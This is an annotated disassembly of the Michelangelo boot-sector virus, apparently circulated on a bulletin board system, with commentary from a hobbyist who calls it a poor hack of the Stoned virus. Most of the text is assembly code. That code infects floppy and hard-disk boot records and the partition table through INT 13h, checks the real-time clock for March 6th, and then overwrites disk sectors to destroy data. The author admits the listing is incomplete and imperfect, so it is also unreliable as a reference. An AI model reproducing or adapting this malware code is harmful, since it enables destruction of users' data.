; Michelangelo ; Size: 512 ; Type: Boot infector ; Date of action: March 6th ; ; data_1e equ 4Ch ; (0000:004C=1DB1h) data_2e equ 4Eh ; (0000:004E=70h) data_3e equ 413h ; (0000:0413=280h) data_4e equ 7C05h ; (0000:7C05=203Ch) data_5e equ 7C0Ah ; (0000:7C0A=49EBh) data_6e equ 7C0Ch ; (0000:7C0C=2A3Ch) data_7e equ 7 ; (694E:0007=0) data_8e equ 8 ; (694E:0008=0) data_9e equ 0Ah ; (694E:000A=0) data_11e equ 7C03h ; (694E:7C03=0) seg_a segment assume cs:seg_a, ds:seg_a org 100h mich proc far start: jmp loc_6 ; (01AF) "This is what you see at sector 0" db 0F5h, 0, 80h, 9Fh, 2, 3 ; A lot of the virus is hidden db 0, 56h, 2, 0, 0C8h, 1Eh ; in these defined bytes db 50h, 0Ah, 0D2h, 75h, 1Bh, 33h ; watch this carefully db 0C0h, 8Eh, 0D8h, 0F6h, 6, 3Fh ; or you will miss where db 4, 1, 75h, 10h, 58h, 1Fh ; it writes to your db 9Ch, 2Eh, 0FFh, 1Eh, 0Ah, 0 ; partiton table db 9Ch, 0E8h, 0Bh, 0, 9Dh, 0CAh db 2, 0, 58h, 1Fh, 2Eh, 0FFh db 2Eh, 0Ah, 0, 50h, 53h, 51h db 52h, 1Eh, 6, 56h, 57h, 0Eh db 1Fh, 0Eh, 7, 0BEh, 4, 0 loc_1: ;Init registers mov ax,201h mov bx,200h mov cx,1 xor dx,dx ; Zero register pushf ; Push flags call dword ptr ds:data_9e ; (694E:000A=0) jnc loc_2 ; Jump if carry=0 xor ax,ax ; Zero register pushf ; Push flags call dword ptr ds:data_9e ; (694E:000A=0) dec si jnz loc_1 ; Jump if not zero jmp short loc_5 ; (01A6) loc_2: ;Zero registers clear direction xor si,si ; Zero register cld ; Clear direction lodsw ; String [si] to ax cmp ax,[bx] jne loc_3 ; Jump if not equal lodsw ; String [si] to ax cmp ax,[bx+2] je loc_5 ; Jump if equal loc_3: ; cmp byte ptr See infected mov ax,301h mov dh,1 mov cl,3 cmp byte ptr [bx+15h],0FDh je loc_4 ; Jump if equal mov cl,0Eh loc_4: ;call out all db hiden data mov ds:data_8e,cx ; (694E:0008=0) pushf ; Push flags call dword ptr ds:data_9e ; (694E:000A=0) jc loc_5 ; Jump if carry Set mov si,3BEh mov di,1BEh mov cx,21h cld ; Clear direction rep movsw ; Rep while cx>0 Mov [si] mov ax,301h ; to es:[di] xor bx,bx ; Zero register mov cx,1 xor dx,dx ; Zero register pushf ; Push flags call dword ptr ds:data_9e ; (694E:000A=0) loc_5: ;Clear all set pop di pop si pop es pop ds pop dx pop cx pop bx pop ax retn loc_6: ;Load all hiden data xor ax,ax ; Zero register mov ds,ax cli ; Disable interrupts mov ss,ax mov ax,7C00h mov sp,ax sti ; Enable interrupts push ds push ax mov ax,ds:data_1e ; (0000:004C=1DB1h) mov ds:data_5e,ax ; (0000:7C0A=49EBh) mov ax,ds:data_2e ; (0000:004E=70h) mov ds:data_6e,ax ; (0000:7C0C=2A3Ch) mov ax,ds:data_3e ; (0000:0413=280h) dec ax dec ax mov ds:data_3e,ax ; (0000:0413=280h) mov cl,6 shl ax,cl ; Shift w/zeros fill mov es,ax mov ds:data_4e,ax ; (0000:7C05=203Ch) mov ax,0Eh mov ds:data_1e,ax ; (0000:004C=1DB1h) mov ds:data_2e,es ; (0000:004E=70h) mov cx,1BEh mov si,7C00h xor di,di ; Zero register cld ; Clear direction rep movsb ; Rep while cx>0 Mov [si] jmp dword ptr cs:data_11e ; to es:[di] (694E:7C03=0) db 33h, 0C0h, 8Eh, 0C0h, 0CDh, 13h ;<- Notice all the db 0Eh, 1Fh, 0B8h, 1, 2, 0BBh ; cd 13 db 0, 7Ch, 8Bh, 0Eh, 8, 0 db 83h, 0F9h, 7, 75h, 7, 0BAh db 80h, 0, 0CDh, 13h, 0EBh, 2Bh db 8Bh, 0Eh, 8, 0, 0BAh, 0 db 1, 0CDh, 13h, 72h, 20h, 0Eh db 7, 0B8h, 1, 2, 0BBh, 0 db 2, 0B9h, 1, 0, 0BAh, 80h db 0, 0CDh, 13h, 72h, 0Eh, 33h db 0F6h, 0FCh, 0ADh, 3Bh, 7, 75h db 4Fh, 0ADh, 3Bh, 47h, 2 db 75h, 49h loc_7:;check if it is time to nuke xor cx,cx ; Zero register mov ah,4 int 1Ah ; Real time clock ah=func 04h don't work on an xt ; read date cx=year, dx=mon/day cmp dx,306h ; See if March 6th je loc_8 ; Jump if equal to nuking subs retf ; Return to launch command.com loc_8:;get ready xor dx,dx ; Zero register mov cx,1 loc_9:;run 7 times nuke 31.5 megs of hd mov ax,309h mov si,ds:data_8e ; (694E:0008=0) cmp si,3 je loc_10 ; Jump if equal mov al,0Eh cmp si,0Eh je loc_10 ; Jump if equal mov dl,80h mov byte ptr ds:data_7e,4 ; (694E:0007=0) mov al,11h loc_10: ;nuke away mov bx,5000h mov es,bx int 13h ; Disk dl=drive a: ah=func 03h ; write sectors from mem es:bx jnc loc_11 ; Jump if carry=0 xor ah,ah ; Zero register int 13h ; Disk dl=drive a: ah=func 00h ; reset disk, al=return status loc_11: ;rest for loc-9 nuking inc dh cmp dh,ds:data_7e ; (694E:0007=0) jb loc_9 ; Jump if below xor dh,dh ; Zero register inc ch jmp short loc_9 ; (0250) loc_12:;time to infect a floppie or hard dirve mov cx,7 mov ds:data_8e,cx ; (694E:0008=0) mov ax,301h mov dx,80h int 13h ; Disk dl=drive a: ah=func 03h infect flopie ; write sectors from mem es:bx jc loc_7 ; Jump if carry Set mov si,3BEh mov di,1BEh mov cx,21h rep movsw ; Rep while cx>0 Mov [si] mov ax,301h : to es:[di] xor bx,bx ; Zero register inc cl int 13h ; Disk dl=drive a: ah=func 03h lets infect hd ; write sectors from mem es:bx ;* jmp short loc_13 ;*(02E0) db 0EBh, 32h db 1, 4, 11h, 0, 80h, 0 db 5, 5, 32h, 1, 0, 0 db 0, 0, 0 db 53h, 53h, 20h, 20h, 43h, 4Fh db 4Dh db 58 dup (0) db 55h, 0AAh seg_a ends ;Last notes this virus looks like a poor hack job on the stoned virus. ;It is kinda cool in the fact that it is hard to get out of the partition table ;even if you nuke the partition table it will live on even if you replace it. ;the only way to get it out of the partition table is 1. debug 2.clean ver 86b ;3 cpav 1.0 and above. oh yeah and all that special shit that came out for it ;this virus uses int 1ah which doesn't work on an XT system. ;the virus isn't actually 512 but that is how much it writes. ;it moves the boot area of a floppy to the last sector on the disk ;and on a harddrive it moves it to the last sector in the root directory ;This should show you all how much the media can over do it on things ;since this is really a lame virus,to tell you the truth there is a lot better ;ones out there. ;This in no way is a complete listing of the code for the virus. ;Nor is it the best since i'm not the best at Assembly. ;Done by Visionary. ;BTW to who ever wrote this virus... Get a life! ------------------------------------------------------------------------------- Downloaded From P-80 Systems 304-744-2253